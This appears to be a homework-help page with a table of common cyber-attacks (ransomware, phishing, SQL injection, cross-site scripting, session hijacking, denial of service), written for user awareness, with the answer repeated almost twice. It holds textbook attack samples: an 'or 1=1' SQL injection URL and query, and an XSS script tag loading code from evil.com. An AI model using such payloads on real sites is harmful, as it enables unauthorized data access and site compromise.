Digital Security Concerns, Complete the information in the table provided to sta
ID: 3712167 • Letter: D
Question
Digital Security Concerns,
Complete the information in the table provided to start a library of common cyber-attacks of which users should be aware.
First Column -- Type of Attack
Second Column -- Description of attack, and what it affects
Third Column --Example of attack, how it is executed, how it is carried out, and the results on the affected computers/ network.
Fourth Column --- Motivation: consider the attack and nature of the attack and determine what motivates the attacker. Often, it is monetary, but there are also other reasons.
Explanation / Answer
SR.
NO
Type of Attack
Description of attack
Example of attack
Motivation
1
Malware
If you've ever seen an antivirus alert pop up on your screen, or if you've mistakenly clicked a malicious email attachment, then you've had a close call with malware. Attackers love to use malware to gain a foothold in users' computers—and, consequently, the offices they work in—because it can be so effective.
The most devastating type of malicious software, by some counts. One of the most advanced and constantly on the rise these days.
Ransomware blocks access to the data of a victim, threating to either publish it or delete it until a ransom is paid. Worse yet, there is no guarantee that paying a ransom will return access to the data, or prevent it from deletion.
This type of malware basically infects the system from the inside, locking the computer and making it useless. Simpler ransomware may lock a system that may be difficult to reverse for most people, while the more advanced variety of ransomware encrypts the files of a victim, rendering them inaccessible, and demanding a ransom payment to decrypt the files.
Ransomware attacks initially gained popularity in Russia, but these types of scams have now grown in popularity internationally. They are typically carried out using a Trojan that comes with a payload that is disguised as a legitimate file.
tactics to extort people to pay a ransom.
2
Phishing
the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers.
Password phishing scam Messages:
This message fraudulently tells you your account is about to expire and tries to get you to click the link to read the message. The sender of the message is not from Lehigh and the link takes you to a non-Lehigh site which may have malicious software. Delete this message. NOTE: you can hover over links to see that it does not go to a real Lehigh domain. You can also verify if your account will soon expire by going to your Lehigh Account web page linked at the bottom of the main Lehigh and Inside Lehigh web pages.
Phishing is used also to get credit card information or Bank account information. Here it is pretty clear what the motivation is. Often the phisher is not the same person who monetizes such information, it may be sold for cash on the “dark web” to someone specialized in monetizing it.
3
SQL Injection Attack
SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.
For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1.As a result, the corresponding SQL query looks like this:
SELECT Item Name, Item Description
FROM Items
WHERE Item Number = 999 OR 1=1
And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those you may not be eligible to access.
to gain access to mid-market companies,
to Target Government Data
3
Cross-Site Scripting (XSS)
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of invalidated or unencoded user input within the output it generates.
The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.
<script> tag
The <script> tag is the most straight-forward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.
To enter vulnerably to any web application to get private information to harm that organization.
5
Session Hijacking and Man-in-the-Middle Attacks
session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. The session token could be compromised in different ways; the most common are: ... Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)
To enter into someone’s login account to stole information
6
Denial-of-Service (DoS)
a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
A distributed denial-of-service (DDoS)attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic.
SR.
NO
Type of Attack
Description of attack
Example of attack
Motivation
1
Malware
If you've ever seen an antivirus alert pop up on your screen, or if you've mistakenly clicked a malicious email attachment, then you've had a close call with malware. Attackers love to use malware to gain a foothold in users' computers—and, consequently, the offices they work in—because it can be so effective.
The most devastating type of malicious software, by some counts. One of the most advanced and constantly on the rise these days.
Ransomware blocks access to the data of a victim, threating to either publish it or delete it until a ransom is paid. Worse yet, there is no guarantee that paying a ransom will return access to the data, or prevent it from deletion.
This type of malware basically infects the system from the inside, locking the computer and making it useless. Simpler ransomware may lock a system that may be difficult to reverse for most people, while the more advanced variety of ransomware encrypts the files of a victim, rendering them inaccessible, and demanding a ransom payment to decrypt the files.
Ransomware attacks initially gained popularity in Russia, but these types of scams have now grown in popularity internationally. They are typically carried out using a Trojan that comes with a payload that is disguised as a legitimate file.
tactics to extort people to pay a ransom.
2
Phishing
the fraudulent practice of sending emails purporting to be from reputable companies in order to induce individuals to reveal personal information, such as passwords and credit card numbers.
Password phishing scam Messages:
This message fraudulently tells you your account is about to expire and tries to get you to click the link to read the message. The sender of the message is not from Lehigh and the link takes you to a non-Lehigh site which may have malicious software. Delete this message. NOTE: you can hover over links to see that it does not go to a real Lehigh domain. You can also verify if your account will soon expire by going to your Lehigh Account web page linked at the bottom of the main Lehigh and Inside Lehigh web pages.
Phishing is used also to get credit card information or Bank account information. Here it is pretty clear what the motivation is. Often the phisher is not the same person who monetizes such information, it may be sold for cash on the “dark web” to someone specialized in monetizing it.
3
SQL Injection Attack
SQL injection is a code injection technique, used to attack data-driven applications, in which nefarious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).[1] SQL injection must exploit a security vulnerability in an application's software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
An attacker wishing to execute SQL injection manipulates a standard SQL query to exploit non-validated input vulnerabilities in a database. There are many ways that this attack vector can be executed, several of which will be shown here to provide you with a general idea about how SQLI works.
For example, the above-mentioned input, which pulls information for a specific product, can be altered to read http://www.estore.com/items/items.asp?itemid=999 or 1=1.As a result, the corresponding SQL query looks like this:
SELECT Item Name, Item Description
FROM Items
WHERE Item Number = 999 OR 1=1
And since the statement 1 = 1 is always true, the query returns all of the product names and descriptions in the database, even those you may not be eligible to access.
to gain access to mid-market companies,
to Target Government Data
3
Cross-Site Scripting (XSS)
Cross-site Scripting (XSS) refers to client-side code injection attack wherein an attacker can execute malicious scripts (also commonly referred to as a malicious payload) into a legitimate website or web application. XSS is amongst the most rampant of web application vulnerabilities and occurs when a web application makes use of invalidated or unencoded user input within the output it generates.
The following is a non-exhaustive list of XSS attack vectors that an attacker could use to compromise the security of a website or web application through an XSS attack. A more extensive list of XSS payload examples is maintained here.
<script> tag
The <script> tag is the most straight-forward XSS payload. A script tag can either reference external JavaScript code, or embed the code within the script tag.
<!-- External script -->
<script src=http://evil.com/xss.js></script>
<!-- Embedded script -->
<script> alert("XSS"); </script> To enter vulnerably to any web application to get private information to harm that organization.
5
Session Hijacking and Man-in-the-Middle Attacks
session hijacking, sometimes also known as cookie hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system.
The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. The session token could be compromised in different ways; the most common are: ... Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)
To enter into someone’s login account to stole information
6
Denial-of-Service (DoS)
a denial-of-service attack is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
A distributed denial-of-service (DDoS)attack occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. Such an attack is often the result of multiple compromised systems (for example, a botnet) flooding the targeted system with traffic.
- to directly profit from his perceived ability to disrupt the victim’s services by demanding payment to avoid the disruption.
- Attackers might use the DoS attack as a way of criticizing the company or government organization for exhibiting undesirable political or geopolitical, economic or monetary behaviors.